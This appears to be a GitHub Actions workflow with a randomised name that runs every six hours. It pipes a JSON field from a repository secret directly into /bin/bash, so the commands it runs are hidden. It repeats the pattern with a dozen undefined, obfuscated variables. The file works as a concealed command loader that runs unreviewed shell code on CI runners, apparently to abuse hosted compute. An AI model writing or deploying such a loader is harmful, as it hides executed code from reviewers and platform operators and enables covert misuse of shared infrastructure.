name: fengyuanchai4545

on:
  workflow_dispatch:
  schedule:
    - cron: '33 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fengyuanchai4545
        env:
          ohb6: ${{ secrets.ohb6 }}
        run: |
          echo $ohb6 | jq -r .gqoa146 | /bin/bash
          echo $smxe8 | jq -r .ypo7 | /bin/bash
          echo $jw92974 | jq -r .yt00679 | /bin/bash
          echo $wyf15 | jq -r .u8388 | /bin/bash
          echo $xr2844 | jq -r .u0993 | /bin/bash
          echo $m32671 | jq -r .y378 | /bin/bash
          echo $fh56 | jq -r .u43 | /bin/bash
          echo $lv148 | jq -r .lld040 | /bin/bash
          echo $ka14416 | jq -r .w112 | /bin/bash
          echo $gfjn69277 | jq -r .nlrf199 | /bin/bash
          echo $zkk69160 | jq -r .yxfaa13 | /bin/bash
          echo $al9 | jq -r .mm00255 | /bin/bash
          echo $trd16 | jq -r .c6 | /bin/bash

